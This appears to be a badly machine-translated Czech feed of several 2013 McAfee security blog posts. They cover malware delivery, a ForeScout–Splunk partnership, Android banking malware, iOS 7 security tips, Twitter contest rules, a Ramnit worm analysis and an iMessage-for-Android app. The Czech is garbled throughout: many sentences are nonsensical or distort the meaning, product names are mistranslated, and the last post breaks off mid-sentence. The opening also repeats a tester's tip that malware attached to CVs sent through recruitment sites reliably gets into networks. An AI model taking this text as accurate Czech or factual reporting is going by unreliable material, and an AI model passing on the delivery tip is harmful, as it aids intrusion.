Z hlediska metod pro získání nově vytvořený malware do cílového síti, není žádným překvapením, že se pokusil-a-pravda metody, jako je sociální inženýrství a kopí phishingu jsou stále nejúčinnější. Ollmann řekl, e-mail je jedním z více účinných způsobů, jak se dostat malware do cílové sítě.
"E-mail s URL na stažení obvykle pracuje," řekl. "Jedna věc, kterou jsem našel, že je velmi úspěšný prochází společnosti nábor webu a pak, když požadují životopis nebo CV, pošlu ji s malware připojené a je to tady."
Splunk a ForeScout partnera na velkých dat a bezpečnostní informace 02.10.2013 Bezpečnost ForeScout oznámila technologické partnerství s Splunk. V souvislosti s partnerstvím, ForeScout je k dispozici obousměrná integrace mezi ForeScout proti a Splunk Enterprise a nový ForeScout App pro podniky Splunk.
ForeScout proti pomáhá organizacím získat úplný přehled o všech zařízeních, uživatelů, systémů a aplikací, které se snaží připojit, nebo na podnikové sítě -. Kabelové nebo bezdrátové, řízený nebo neřízený, PC nebo mobilní zařízení jsou dynamicky zjistil, klasifikovány, profilovaný a posuzována bez nutnosti činidla. Proti týká politiky založené na ovládací prvky:. Povolit, omezit nebo zablokovat přístup, správu hosty a BYOD uživatele, sledovat a prosazovat dodržování koncových bodů a zmírnění jejich porušování a expozice Veškeré získané informace, jakož i protokoly událostí, lze zaslat Splunk Enterprise pro data analýza, reporting a optimalizované retence. Kromě toho, může obsluha umožňuje Splunk Enterprise komunikovat s neutralizovat přímo snížení bezpečnostních problémů. V důsledku toho mohou IT organizace, aby jejich údaje skutečně žalovatelné. ForeScout aplikací pro Splunk Enterprise umožňuje zákazníkům snadno používat a vytvářet širokou škálu operačních zprávy a reporty, které využívají podnikání Splunk efektivně analyzovat, vizualizovat a ukládat obrovské objemy identita, zařízení, aplikací, přístupu a porušení údaje získané ForeScout proti. Bezpečnostní analytici mohou kombinovat informace s ostatními velkými zdroji dat pro monitoring v reálném čase a provádět prohlídky historických identifikovat pokročilých hrozeb, podvodů a další bezpečnostní rizika. Kromě toho mohou Splunk být snadno konfigurován pro vysílání spustil dat událostí do ForeScout proti, aby k nápravě problémů zabezpečení koncových bodů izolát porušena systémy nebo spuštění dalších politik založených na kontroly. "V dnešním hrozeb, všechna data je bezpečnost relevantní a vyžaduje řešení, které poskytuje real-time pohled. ForeScout proti zajišťuje viditelnost sítě a koncového bodu aktivity, které naši zákazníci mohou využít, aby se zvýšil jejich Splunk analytiku, aby bylo možné monitorovat kritických problémů zabezpečení a urychlení vyšetřování, "řekl Bill Gaylord, senior viceprezident pro rozvoj obchodu společnosti Splunk . "Využití interoperability Splunk Podnikání a ForeScout nejen pomáhá rozšiřovat plochu pro zákazníky mnohem rychleji as jistotou identifikovat problémy, ale také přispívá k automatizaci ovládacích prvků přímo zmírnění hrozeb."
Firmy i mobilní bankovnictví a obchodu, část I 3.10.2013 Bezpečnost | Mobil
Vždy jsem byl zájem o to, jak "průměrný Joe" definuje mobilní bankovnictví. Být tak podílí na zabezpečení světě, dělal to pro mě těžké vidět mobilní bankovnictví jako mnoho dělat. Zeptal jsem se kolem-mí přátelé, jejich přátele, různých sítí a dospěl k závěru, že existují tři odlišné a často nepochopen kategorie mobilního bankovnictví: Mobilní platby Mobilní autentizace Hodnota mobilních dat I když každý z nich má své vlastní odlišnosti, existuje dostatek podobnosti matoucí pro průměrného Joe. Tam je rozdíl mezi spotřebitelem a obchodní bankovnictví když přijde na mobil. Samozřejmě, že v retailovém bankovnictví poskytuje přístup k účtům u instituce a nabízí některé praktické způsoby, jak zaplatit účty a přesunout peníze. Obchodní bankovnictví je, že navíc další zpracování plateb přes mobilní zařízení a náměstí, Google, Intuit a jiné jezdecké mobilní komerce vlak. Dokonce i tradiční Store and forward POS systémy týkající se zranitelnosti. Co podniky potřebují pochopit, že zařízení, které se používají, aby se plateb je pod útokem! Tento "backdoor" Trojan, který krade data bez vědomí oběti a malware, které vede po sdělení bankovnictví Přihlásit se tvoří největší část všech nových mobilních malware rodin. McAfee Labs zjistili, že se systémem Android malware obnovil růst, zaznamenaný v roce 2012. V tomto čtvrtletí téměř 18.000 nových Android malware vzorky byly katalogizovány. Níže je několik příkladů některých nových Android hrozeb spadají do těchto nevýhradních kategoriích: Bankovní malware, který zachytí SMS zprávy, které obsahují požadované token přihlášení do něčí bankovní účet. Přitom mohou cybercriminal gangy přímo přístup a bankovní účty prázdných obětí. McAfee Labs vědci identifikovány čtyři významné kousky malware, že "vpřed" požadovaná přihlášení token cybercriminal gangy. Weaponized verze legitimních aplikací, které kradou uživatelská data. Upravená verze KakaoTalk aplikace sbírá citlivé informace o uživatelích (kontakty, záznamy o hovorech, SMS zprávy, nainstalované aplikace, a umístění) a posílá data na útočníkův server. Falešná app instalační skutečně instalují spyware shromažďovat a poskytovat uživatelských dat zločinci Nové Android vzorků malwaru I když existuje více typů útoků roste a výše se týkají mě nejvíce pro menší podniky. Obavy mám, je, že se nedělá dost pro ochranu těchto citlivých zařízení a aplikací z exploitu. Na osobní úrovni, matčin vyšívání obchodní zrovna velký upgrade a nyní poskytuje služby v různých lokalitách města Washington a Oregon, kde se různé vyšívané výrobky prodávány bleší trh styl. Upgrade byl nový Android smartphone s čtečkou kreditní karty pro kreditní a debetní transakce. To nebylo dokud zákazník požádán o zabezpečení jejich transakcí, které jsme ještě zvažoval mobilní zařízení a vše, co stálo za to. Jak je informace o kreditní kartě uložené a přenáší? Jak jsou zařízení chráněna před špatnými aplikací, které se snaží získávat a sledovat tyto transakce? I když existuje celá řada útoků, jejichž cílem je sbírat přihlašovací údaje pro bankovní účty Řekl bych vám, že tyto útoky nejsou to, co byste měli dělat starosti. Co musíme dělat starosti, je systém POS sám. Nyní při pohledu na nárůst útoků tabulce nad ním je naprosto děsivá pro podnikání a zákazníky podobně. Zůstaňte naladěni pro mobilní ověřování vs mobilního bankovnictví a obchodu
Jak moc jsou vaše aktiva stojí?
3.10.2013 Bezpečnost
Nyní, pokud vaše daňová přiznání jsou aktuální a máte zdravý vztah s finanční plánovač, nemám pochyb o tom, jste mohli odpovědět na tuto otázku v jediném okamžiku. Ale co vaše ostatních aktiv? A já jsem neměl na mysli vaše děti, protože jasně, že jsou k nezaplacení - většinu času! Mluvím o vašich digitálních dat - vaši hudbu, vaše fotky, vaše kontakty online a dokonce i vaše dokumenty a soubory. Jak moc jsou tyto věci pro tebe cenu? Co by stálo nahradit? No, McAfee nedávno zveřejnil výsledky průzkumu, který ukazuje, že průměrný Australan hodnoty jejich digitálního majetku na více než 33.000 amerických dolarů! To je cena průměrného vkladu úvěru na bydlení. Výzkum ukazuje, že přes 47% Australanů že mnohé z jejich digitálních dat je nemožné nahradit, mnozí z nás ještě opouštět naše zařízení nechráněné zvyšující šanci na něco nešťastného nastávat. A zatímco 65% z nás zajistit své notebooky pouze 22% z nás se obávají o našich chytrých telefonů, což je alarmující s ohledem na obrovské množství informací my všichni ukládat na našich telefonech. Ztratil jsem dva telefony v loňském roce a že jsem také ztratil jeden rok z mého života. Nejen, že jsem ztratil spoustu fotografií z mých kluků, ale já nikdy nebudou schopni obnovit mnohé z mých kontaktů. Není divu, že hodnotu přisuzujeme našich digitálních aktiv se zdá být stanoven na základě našeho věku. Ve věku 18-24 let věří, že osobní vzpomínky na jejich zařízení, které stojí téměř 73.000 dolary, zatímco 55 až 65 rok koně hodnota jejich digitální aktiva jen něco málo přes 2.000 amerických dolarů. Je zřejmé, Gen Y'ers nemají pochopení pro vinylu! Co tedy můžeme udělat pro to, aby naše vzácné vzpomínky v bezpečí? Není pochyb o tom, že nejlepší způsob, jak chránit své ceněné digitální vzpomínky je investovat do nějaké top-police internetové ochrany. McAfee nedávno LiveSafe - v horní linie Rolls Royce balení zabezpečení, která nabízí neomezené zabezpečení zařízení k PC, Mac, chytrých telefonů a tabletů před nejnovějšími viry, malware a spam spolu s mnoha dalšími doplňky, včetně: Schopnost sledovat a uzamknout svá zařízení v případě ztráty Intuitivní cloud-based "Trezor" McAfee nástroj pro správu hesel SafeKey A pokud potřebujete další motivaci jen přemýšlet, jak by to bylo zklamáním přijít o ty trapné možnost fotografování dětí pro veřejnost vystaveny v jejich 18 th narozeninovou oslavu. Takže nyní jednat, takže si můžete rozpaků později! "Až příště
Bezpečnost na jádru iOS 7 Apple
3.10.2013 Bezpečnost
Byl to plodný období pro Apple, s vyhlášením nového produktu a softwaru a silné krok do mobilního bezpečnostní frontě s přídavkem otisků prstů technologie jako součást jejich nejnovější iPhone verzi. Pro nejvíce se rozdělit, jsou jak 5s iPhone a iOS 7 vychvaluje jako nejbezpečnější nabídky Apple k dnešnímu dni. Není pochyb o tom, bude tato aktualizace zabezpečení osloví mnohé z nás, kteří vidí rostoucí význam ochrany informací s sebou nosíme na mobilních zařízeních. A jako bitva mezi Apple a Android zařízeními i nadále, mohlo by tyto aktualizace mohou být klíčem k tomu, kdo vyjde dopředu. Pokud vše půjde dobře pro Apple, může telefon a OS aktualizace se standardy pro výrobce, kteří chtějí spojit hvězdnou uživatelské zkušenosti s bezpečným funkčností. Pouze čas ukáže, v průběhu několika příštích týdnů. Co přesně je to, že má Apple uživatelům bzučení o změnách obou telefonu a software? Začněme s novým operačním systémem (OS), 7. iOS. Aktualizovaný software je nejen obrovský posun v návrhových předpokladů pro Apple, ale také jasné porozumění pro důležitost bezpečnosti na spotřebních zařízení. Menší podíl na trhu produkty Apple udržuje ho poměrně mimo radar pro cybercrimals zaměří své snahy na tom, kde větší uživatelská základna je. Ale tato nová nabídka ukazuje, že i ohrožení zvýšení kreativity a složitosti, že ochrana kolem našich mobilních zařízení musí být připraveni na takové útoky, bez ohledu na výrobce. Jakmile začnete používat nový operační systém a jeho funkcí, je snadné vidět, že Apple představil některé revoluční změny zabezpečení pro ty obavy o rostoucí přítomnost mobilního telefonu malware . Zde je rychlý pohled na jen některé z funkcí v novém iOS 7 se vzrušovat: Správa hesel pomocí iCloud Keychain. iCloud Keychain dává Apple uživatelům skvělý způsob, jak udržet přehled a přístup jejich Keychain hesla přes všechny jejich iOS a OS X zařízení (v podstatě z jakéhokoliv mobilního zařízení Apple či v osobním počítači). A nakonec, s uvedením nového systému Mac OS Mavericks, budou všechny vaše klíčenka hesla k dispozici, a zašifrovány na iCloud , Apple bezpečný cloud služby. Převzít kontrolu vašeho soukromí, na webových stránkách a na telefonu. Uživatelé se nyní mohou snadněji ovládat aplikace třetích stran s per-app kontrol za využití dat, mikrofon přístup a přístup ke kameře. Dále iOS 7 zavádí "Do Not Track" přírůstek do Safari, který zajišťuje, že vyhovují webové stránky nebudou moci sledovat pohyb uživatelů mezi webové stránky. Blokování nežádoucích hovorů nebo textů. S iOS 7 aktualizace, budete se také moci blokovat nechtěné hovory, zprávy a FaceTime interakce od nežádoucích kontaktů. Omezit autoritu jiných zařízení. Předtím, když jste připojeni zařízení k počítači pomocí kabelu USB, počítač se okamžitě měli přístup k zařízení jako paměťové zařízení USB. Nyní bude váš přístroj považovat počítač jako nabíječky, pokud se přihlásíte se svým Apple ID a hesla před povolením počítač pro přístup k datům na vašem iPhonu nebo iPadu. I když většinu funkcí uvedených jsou snadno dostupné pro uživatele na některý iPhone 4 a novější, kteří ke stažení nový OS, největší bezpečnostní funkce, s dotykovou ID -Apple otisk Řešení identity ─ je k dispozici pouze na iPhone 5 sekund. Mnoho technologických společností pracuje začlenit biometrické prvky do svých bezpečnostních funkcí a Apple zdá k dělali tak docela hladce začlenění prstu skenování technologií do jejich nejnovější verze produktu. Apple snímač otisků prstů je integrovaná v rámci domácího tlačítkem, což je přechod bezproblémový více zkušené uživatele iPhone. Dříve jich bylo nepoužíváte funkci zámku obrazovky, ale dotykový ID může inspirovat některé uživatele, aby zkusili palec na zajištění jejich zařízení. Funkce viděl několik nezdarů a hlášeny hacky v prvních několika dnech po vydání, ale lidé jsou stále zaplavení linek mimo prodejny Apple dostat své ruce na nového telefonu. A pro ty, kteří se obavy, že vaše tisková budou zaslány nějaké tajné databáze NSA pro ukládání a katalogizace, Apple dal jasně najevo, že otisky prstů údaje budou uloženy pouze na skeneru čipu, nikoli prostřednictvím iCloud nebo aplikací třetích stran (vedení skenování striktně na vašem zařízení). Nakonec Touch ID je volitelná funkce. Stále můžete nyní nový iPhone 5s, aniž by to aktivní, měli byste být na plot o používání otisků prstů bezpečnostní kontroly. Se všemi těmito novými funkcemi v mysli, mohl Apple určitě vede cesta pro silnou každodenní ochranu mobilních zařízení a aplikací. Pokud je zbytek na mobilním trhu po společnosti Apple vedení se jen některé z těchto funkcí, můžeme vidět zvýšenou ochranu mobilních dat a doufejme, že pokles počtu osob postižených škodlivé počítačové aktivity. Nicméně, dokonce s těmito novými cennými papíry nainstalován, stále ještě existují některé akce, které mohou pomoci udržovat vaše mobilní data chráněná přes nějaký OS nebo mobilní telefon modelu: Udržujte vaše zařízení na uzamčení. ať už s 4-místným kódem PIN nebo otisk prstu, aby se vaše mobilní zařízení zavřený, když se nepoužívá. Pravidelně měnit a aktualizovat hesla jako prevence proti kybernetickým snoops. Ujistěte se, že nebudete používat stejné heslo na více účtů, tj. finanční, sociální média a e-mailové přihlašovací údaje. Zkontrolujte, než kliknete na odkaz. Neklikejte na odkazy nebo přílohy v e-mailech nebo zprávy od odesílatelů, které neznáte, by mohly vést k malware či jiným nežádoucím ke stažení. Dávejte si pozor na zprávy, které žádají o osobní údaje. Ať už je to v e-mailu, textové zprávy, sociální média zprávy nebo chat, bude většina firem nepožádá o informace nemají potřebu, jako je e-mail heslo. Pokud požadavky se zdají podezřelé, hrát to bezpečné a nedávají se vaše cenné informace. Chraňte svůj třetí strany app přístup. Dávejte si pozor na mobilních aplikací, které žádají o povolení více, než by měly potřebují pro výkon svých činností. Herní aplikace by nemělo být nutné přístup k umístění informací nebo e-mailové hesla. Buďte vybíraví, kde si stáhnout. Držte důvěryhodných obchodů zejména při stahování aplikací, jako třetí-party app obchody a webové stránky lze spojovat s rizikovými aplikací a malware laděných programů. Důvěryhodných dodavatelů, jako je Apple App Store a Google Play mít ochranu na místě, které vám pomohou zajistit aplikace, které stáhnete do svého mobilního zařízení to, co říkají. Vyhněte se veřejné Wi-Fi při přístupu aplikace, které drží citlivá data. Nevstupujte do aplikací, které vyžadují citlivé přihlašovací údaje, tj. bankovní aplikace, prostřednictvím veřejné Wi-Fi signálu, řekněme v místní kavárně, nebo byste mohli být vzdát své největší důvěryhodné informace o kybernetických snoops sedí vedle vás. Udržujte své aplikace up-to-date. Ujistěte se, že nainstalovat nejnovější aktualizace na každé z vašich aplikací, mnoho adresa známé chyby a aplikovat záplaty bezpečnostních děr. Změna může být obtížné, ale může také vést k nové a vzrušující zlepšení.
2013 Most Dangerous Celebrities seznam, byl propuštěn 17. září zjistila, že na 7. ročník rok v řadě, ženské osobnosti jsou mnohem nebezpečnější než jejich mužské protějšky. Herečka Lily Collins (dcera rockové legendy, Phil Collins), na špičce seznamu jako "nejnebezpečnější celebritou" s 14,5% uživatelů hledá svůj název přistání na škodlivé webové stránky. Jen tři muži z Top 20 v letošním roce- Mad Pánské Jon Hamm (č. 8), Justin Timberlake (č. 12) a Chirurgové je Patrick Dempsey (č. 13). Navíc hudebníci se zdají být zvláště nebezpečné pro vyhledávání, s 17, aby jejich cestu na letošní Top 50 seznamu. Aby bylo možné pokračovat v podpoře bezpečného celebrity vyhledávání, společnost McAfee být spuštěn retweet vyhrát soutěž s naším publikem Twitter průběhu několika příštích týdnů. Vítězové obdrží Samsung Galaxy Note 10.1 16G tabletu a 1-roční předplatné McAfee LiveSafe ™ služby. Jediné, co musíte udělat, je retweet denní soutěž tweet vstoupit! Pomozte nám šířit slovo o bezpečných hledání postupů a zmařit podvodníci pomocí oblíbených témat ohrozit uživatelé online. Postupujte podle pokynů níže pro šanci vyhrát ve velkém! MDC_RT2Win
# # RiskyCeleb RT2Win Pravidla soutěže 1. Chcete-li zadat, přejděte na https://twitter.com/McAfeeConsumer . Najít soutěž tweet dne, který bude zahrnovat hashtags: # # RT2Win a RiskyCeleb, každý všední den od pondělí 30.září té , až v pátek 11.října th , 2013. 2. Podívejte se na soutěžní tweet každý všední den začíná na 8am PT a retweet s hashtags # RT2Win a # RiskyCeleb. 3. Seď po dobu jednoho šťastného výherce bude oznámen každý týden v pondělí. Obchodní podmínky 1.. Jak se přihlásit: Ne nákup nezbytné. Nákup nebude zvýšit vaše šance na výhru. V "McAfee Most Dangerous Celebrities" retweet vyhrát Drawing (dále jen "Soutěž") bude mít dvě kreslení období během níž musí být všechny záznamy přijat. Pacific Time bude kontrolovat pro všechny účely této soutěže. Dvě (2) Vítězové budou vybráni, jeden pro každý výkresu období. Kreslení období jsou následující: Kresba 1 : 08:00 pondělí 30.září th přes 17:00 Pátek 4.října th . Výkres 2 : 08:00 pondělí 7.října th přes 17:00 pátek 11.října th . Během každého období Kreslení, přejděte na stránku McAfee na Twitteru a postupujte podle následujících kroků. Najít soutěž tweet dne, který bude zahrnovat hashtags: # # RT2Win a RiskyCeleb. Retweetnout na soutěžní tweet den a ujistěte se, že zahrnuje jak RT2Win # a # RiskyCeleb hashtags ONLY. Podívejte se na soutěžní tweet denně počínaje 8am PT . Retweets dalších tweetů a ty, které neobsahují jak RiskyCeleb # a # RT2Win hashtags nebudou brány v úvahu. Způsobilé soutěže tweety budou vyhlášeni každý den v 8 hodin ráno PT během kreslení období na @ McAfeeConsumer krmivo představovat # RT2Win hashtag. Každý retweet musí obsahovat RiskyCeleb # hashtag být mohli vyhrát, a vítězové budou vybráni na konci každého týdne (pátek). Žádný jiný způsob bude přijata vedle Twitter. Záznamy z jednoho výkresu nejsou přeneseny na pozdější čerpání (musíte zadat každý výkres samostatně). Pouze jeden způsobilý tweet na osobu a kreslení. 2.. Způsobilost: Soutěž je otevřena celosvětově k těm, kteří jsou ve věku 18 let nebo starší dnem začíná soutěž. Zaměstnanci společnosti McAfee a jejích dceřiných společností, poboček, výherní dodavatelé a reklamní a propagační agentury, jejich nejbližší rodinní příslušníci (manželé, rodiče, děti a sourozenci, a jejich manželé) a osoby žijící ve stejné domácnosti jako takoví zaměstnanci jsou nezpůsobilé. Vítěz jednoho výkresu může vstoupit v následujících výkresech. 3.. Vítěz Výběr: Vítěz každého výkresu bude vybráno náhodně ze všech způsobilých retweets přijatých v průběhu výkresu je vstupním období. Svou účastí účastníci souhlasí, že budou vázány oficiálních pravidel soutěže a rozhodnutí koordinátorů, které musí být konečná a závazná ve všech ohledech. Šance na vítězství závisí na celkovém počtu způsobilých přijatých retweets. Vítěz Oznámení: Každý výkres Vítěz bude oznámen prostřednictvím přímého zprávu na Twitter.com na konci každého výkresu období. Výherci budou muset podepsat čestné prohlášení o způsobilosti a odpovědnosti / publicita Release (pokud to zákon umožňuje), které mají být vráceny do čtrnácti (14) dnů od písemného oznámení, nebo cena může propadnout a alternativní vybraného vítěze. Pokud je oznámení cena vrátí jako nevyzvednuté nebo nedoručitelná na potenciální vítěze, pokud potenciální vítěz nemůže být dosaženo do čtyř (4) kalendářních dnů od prvního oznámení pokus, nebo pokud potenciální vítěz nevrátí požadovaný dokument ve stanovené lhůtě, nebo Pokud potenciální vítěz není v souladu s těmito oficiálními pravidly, pak taková osoba musí být diskvalifikováni a na sponzora uvážení, může alternativní vítěz vybrán pro udělení ceny na otázky založené na procesu výběru vítěze je popsáno výše. 4. Ceny: Cena za každé čerpání je Samsung Galaxy Poznámka 10.1 Tablet s 16 GB vnitřní paměti a 1-roční předplatné McAfee LiveSafe ™ služby (přibližná maloobchodní hodnota "ARV" každé ceny je $ 580). Účastníci se shodují, že McAfee má výhradní právo rozhodovat o vítězi výkresu a všechny záležitosti či spory vyplývající z výkresu a jeho stanovení je konečné a závazné. Nejsou žádné prize lavičky, převody nebo peněžní ekvivalenty přípustné pouze na uvážení společnosti McAfee. Sponzor nenahradí žádné ztracených nebo odcizených ceny. Sponzor není odpovědný za zpoždění v prize dodávky mimo jeho kontrolu. Všechny ostatní náklady a položky, které nejsou výslovně uvedeny v těchto oficiálních pravidlech nejsou zahrnuty a jsou jediným výherce "zodpovědnost. ARV z ceny mohou podléhat výkyvům trhu. V případě, že řečený ARV o ocenění je vyšší než skutečné maloobchodní hodnotě ceny v době ocenění, rozdíl však být uděleny v hotovosti nebo jiným způsobem. 5. Všeobecné podmínky: účastníci na trhu se shodují, že zadáním že souhlasíte s těmito pravidly. Všechny federální, státní a místní daně, poplatky a příplatky na obalech prize jsou výhradní odpovědností nositelku. Sponzor není odpovědný za nesprávné nebo nepřesné vstupní informace, ať už způsobená kterékoli ze zařízení nebo programování spojené s nebo využity v soutěži, nebo jakýmkoli technickým nebo lidské chyby, ke kterým může dojít při zpracování soutěžních příspěvků. Zadáním účastníci uvolnit a ochráníte McAfee a její příslušné mateřské společnosti, pobočky, přidružené společnosti, ředitele, vedoucí pracovníky, zaměstnance, právníci, zástupci, jakož i zástupci z veškeré odpovědnosti za případné zranění, ztráty, nároky, akce, poptávky, nebo poškození jakéhokoliv druhu vyplývající z nebo v souvislosti se soutěží, každý výhru, jakémukoliv zneužití nebo porucha ceny uděleny, účast v jakékoli soutěž související činnosti, nebo účast v soutěži. Cena Propadnutí : Každá cena bude udělena. Pokud vítěz nemůže být oznámeny, nereaguje na oznámení, nesplňuje požadavky na způsobilost, nebo je neposkytne v souladu s těmito kreslení pravidel o ceny, pak vítěz ztrácí právo na cenu a alternativní laureát bude vybrán ze zbývajících způsobilých přihlášek pro každý Kreslení. Řešení sporů : Účastníci souhlasí, že McAfee má výhradní právo rozhodovat o vítězi výkresu a všechny záležitosti či spory vyplývající z výkresu a jeho stanovení je konečné a závazné. Nejsou žádné prize lavičky, převody nebo peněžní ekvivalenty přípustné pouze na uvážení společnosti McAfee. Rozhodné právo : Každý cenu kreslení a tato pravidla budou vykládány v souladu s právními předpisy, soudní příslušnost a místo konání v New Yorku. Ochrana osobních údajů : Osobní údaje získané v souvislosti s tou kresbou výher bude nakládáno v souladu politiky stanovené v http://www.mcafee.com/us/about/privacy.html (McAfee Privacy Policy).
Ramnit Malware Vytvoří FTP síti z počítačů, obětí 3.10.2013 Viry | Kriminalita | Hacking
Červ Ramnit se objevil v roce 2010. Během roku bylo více než osm milionů infikovaných počítačů po celém světě. Zpočátku malware právě soubor infikuje šíří vyměnitelné jednotky. Později se stal lépe poznat za krádež uživatelských dat prostřednictvím prohlížeče injekcí, se zaměřením bankovní nebo hry od uživatele. Při prohlížení malware nedávno jsme zjistili, nové vzorky s aktivními domén. 20130930 Ramniit-1
Ramnit stále převládá a staré domény jsou pravidelně aktualizovány. Některé z oblastí jsou již "sinkholed" (přesměrován komunikovat pouze s řízenou serverem a ne s jeho škodlivých vývojáři) jinými výzkumníky bezpečnosti. Na rozdíl od jeho typických charakteristik (malware infikuje .exe / html soubory, hákování procesu aplikace Internet Explorer) Ramnit nastavuje FTP server na oběti stroj. Tento server FTP stává součástí RMNetwork FTP. Tento server FTP podporuje následující příkazy: USER, PASS, CWD, CDUP, QUIT, PORT, PASV, TYPE, MODE, RETR, STOR, APPE, REST, RNFR, RNTO, ABOR, DELE, ŘSD, MKD, LIST NLST, SYST, STAT, HELP, NOOP, SIZE, EXEC, a PWD. 20130930 Ramniit-2 Pomocí těchto příkazů útočníky můžete ovládat počítač na dálku, krást jiné citlivé soubory a spustit další škodlivé soubory. Infikované počítače, které jsou firewallem nebo sedět za překlad síťových adres nemůže "spojit" RMNetwork FTP, ale mohou komunikovat s řídicím serverem pomocí TCP port 443 nebo 447 s vlastní šifrování. 20130930 Ramniit-3 Při pohledu na malware v doménových jmen, které se zdají být vytvořeny domény algoritmus generace. Nicméně, tyto aktivní domény napevno v binární. To znamená, že nové binární soubory jsou vytvářeny s malware stavitel nástroj a šíří jiným malwarem, nebo phishing. Tyto domény jsou šifrovány pomocí XOR algoritmu s různými klíči pro každý vzorek. 20130930 Ramniit-4 McAfee zákazníci jsou již chráněni před touto hrozbou.
Sociální média: nový základ pro marketing 3.10.2013 Bezpečnost | Ochrana
Není pochyb, sociální média změnila, jak se trh a jak budeme komunikovat. Už za "nová média" Dnes sociální média je rozhodující kamenem snahy nejvíce firem, aby si udržely zákazníky, partnery, investory a zaměstnance informovat o klíčových iniciativ a podporovat dva-cesta dialogy, které zvyšují angažovanost, pochopení a věrnost . Dnes jsem nadšený, že vstoupit do těchto rozhovorů McAfee a k ovlivňování sociálních médií pro sdílení více o věnování McAfee na vytvoření digitálních řešení zabezpečení, které chrání jednotlivce a podniky po celém světě. Ale nejdříve mi dovolte, abych se představil. Jsem Penny Baldwin, McAfee marketingový ředitel, a já jsem zodpovědný za globální společnosti McAfee marketingové strategie a programy. Připojil jsem se McAfee na konci loňského roku a důvod byl prostý: digitální bezpečnostní kategorie roste výbušné tempem a McAfee je dobře umístěn vydělávat na trend. Naše produkty, naši lidé, naši partneři, naše VaV, a naše značky představují jedny z nejsilnějších, nejchytřejší, a nejcennějších aktiv v průmyslu. A s inovací, pozice na trhu, a zdroje Intel se blížíme dodat to, co žádná jiná bezpečnostní agentura může: komplexní a integrovaná, spojen, vrstvené, hardware rozšířené bezpečnostní řešení pro podniky a osobní použití, které chrání z čipu mrak. Je to vzrušující čas, McAfee a v našem oboru. Očekávám, že tempo změn v průběhu následujících 12-18 měsíců daleko vyšší než všechny předchozí časové období. My prostě nemůžeme dovolit, aby inovovat, ať už v našich výrobcích, strategie, nebo náš marketing. Bezprostřednost, dosah a dopad na sociální média je rozhodující nástroj pro McAfee, a my jsme již zahájila několik klíčových iniciativ se sociálními ve středu. Tam je zdánlivě nekonečný potenciál a výkon v sociálních médiích. To je důvod, proč dnes, já jsem také zahajuje můj osobní Twitter zvládnout lépe zůstat spojen s naší online komunity. Budu sdílet novinky a informace o společnosti McAfee, stejně jako můj pohled na trendy v bezpečnostním prostoru. Podél cesty, budu poklesu některé z mých osobních zkušeností kolem osvědčených postupů pro integrovaný marketing, branding a sociálních médií, plus některé myšlenky o ženách v tech a vedení. Penny Baldwin Twitter Ale to není jen o tom, co musím říct, je to o jiskření dialogu. Takže doufám, že budeš se mnou v rozhovoru, protože to je moc a možnost sociálních médií. Podělte se o své myšlenky, se mnou na Twitter a dejte mi vědět, jaké druhy témat, které byste chtěli, abych blog o zde. Těším se na jednání, co máte na srdci.
Proč Tech-Driven děti potřebují Bezpečnostní zaměřených rodiče 3.10.2013 Bezpečnost | Ochrana
zabezpečeníVěděli jste, že říjen je National Cyber Security Awareness Month? Ano, je to sousto, ale to je problém, který je rozhodující pro vaši rodinu a tady je důvod, proč. Jako rodiče vychovávat děti v těchto tíživých digitální době, každý den technologie jak jeho přínosy a její rizika, ovlivňuje rodinná dynamika. Když se někteří z nás stali rodiče více než 20 lety, jsme měli žádný náznak, že technologie bude vyvíjet-Strike, že vybuchne, požadovat takovou dominantní roli v rodinném životě. Takže se ocitáme se snaží sladit naše hodnoty a cíle s kulturními proměnnými technologie, a nebezpečí, které s sebou. Není pochyb o tom, že je to nový druh rodičovství, který vyžaduje nový soubor dovedností. Technologie je v našich domovech a v rukou našich dětí pokaždé, když se otočím, a to může šlapat na posvátnou půdu, získávají větší vliv v životech našich dětí v době, než i my mít. Museli jsme přehodnotit Normana Rockwella verzi rodiny a komunity jsme kdysi představovala. Nyní naše rodiny jsou propojené a naše komunity, z velké části, jsou on-line. Ale s rostoucím vlivem tech v životě našich dětí ", jsme také získali nebývalé výhody lepší komunikace, přístup k učení a zvýšit konektivitu k jednomu jiný. Technologie se k nám připojil po celém světě, a dal nám klid a zdrojů v době krize. Máme zvýšil technicky zdatné děti s lepší přístup k informacím, vzdělání a příležitosti, než jakékoliv jiné generaci v historii. Dobrou zprávou je, že spolu s tímto posunem, jsme se naučili rychle rozpoznat a bojovat proti kriminální živly, které se valí na boku žádnému zřetelnému pokroku. Jako rodiče, učíme se správně vážíme technologie schopnost postoupit, stejně jako bránit a izolovat a my (zdánlivě) se zdají být určen k ochraně své rodiny on-line. S moudrosti získané z pevných ponaučení, jsme se naučili postupovat s více otevřenou myslí, otevřené oči a bystrým povědomí o digitálních nebezpečí, která nějak unikají zraku našich dětí linky. Zatímco naše děti jsou víc nadšení než opatrný s jejich gadgets, je to naše práce jako rodiče, aby se jejich oči, uši a vnitřní varovné systémy, dokud jsme vyvinuli tyto kybernetické smysly na vlastní pěst. Takže tento měsíc budeme psát pouze na konkrétní způsoby, jak můžete zvýšit bezpečnost na domácí frontě. Doufáme, že se k nám v tomto úsilí zaměřené na zvyšování povědomí o online bezpečnosti kolem. Spolu s tímto blog, podívejte se na McAfee další odborníci na této stránce, protože diskutovat o kybernetické bezpečnosti do hloubky a prozkoumat naše společná odpovědnost v chápání tohoto stále přesouvá problém.
iMessage pro Android: Bezpečnostní rizika v rouše beránčím? 3.10.2013 Mobil | Bezpečnost
Pro některé může být komunikace mezi iPhone a Android zařízení jevit jako jablka s hruškami. Mezi uživatele Android, může závidět být postačující pouze slovo, pokud jde o programu společnosti Apple IMessage, který umožňuje uživatelům posílat texty, dokumenty, fotografie, videa, kontaktní informace a zprávy skupiny bez použití jejich textu plán s jinými mobilními zařízeními Apple na iOS 5 nebo novější. Tato služba poskytuje alternativu k standardním textovém / MMS, a až do nedávné doby byl exkluzivní funkce od uživatele zařízení Apple. Nicméně, může být nová aplikace našli způsob, jak překlenout propast, čímž IMessage na Android uživatele, av podstatě otevření linky pro rychlejší, pohodlnější komunikaci mezi zařízeními na obou platformách. Ale za jakou cenu? Tato třetí-party aplikace, tzv. IMessage Chat, který se otevřel síť IMessage na Android uživatelům, získal desítky tisíc téměř okamžité stažení. Bohužel, App vzestup ke slávě téměř stejně rychle, následuje to přijde pod palbou po řadě o bezpečnostní chyby byly objeveny , včetně četných stížnostech na něj otevírat dveře pro mobilní malware . Minulý týden bylo zjištěno, že IMessage Chat směruje zprávy prostřednictvím serveru třetí strany v Číně a pak předává data do Apple. Zprávy 